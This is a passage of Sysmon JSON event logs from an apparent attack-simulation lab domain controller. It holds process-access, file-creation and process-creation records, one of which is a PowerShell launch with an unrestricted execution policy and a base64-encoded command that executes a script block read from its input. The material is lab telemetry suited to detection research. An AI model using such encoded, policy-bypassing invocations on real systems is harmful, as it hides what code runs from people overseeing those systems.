C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4539,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4540,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.639\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nProcessId: 4920\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_otufhhuj.gwd.ps1\r\nCreationUtcTime: 2020-08-01 05:52:18.639","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.639","ProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_otufhhuj.gwd.ps1","CreationUtcTime":"2020-08-01 05:52:18.639","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4541,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.670\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.670","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4542,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.670\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.670","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4543,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4544,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.736\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001023D00600}\r\nProcessId: 1064\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nParentProcessId: 4920\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.736","ProcessGuid":"{A837DB8D-0312-5F25-0000-001023D00600}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","ParentProcessId":"4920","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4545,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nSourceProcessId: 4920\r\nSourceThreadId: 4332\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001023D00600}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 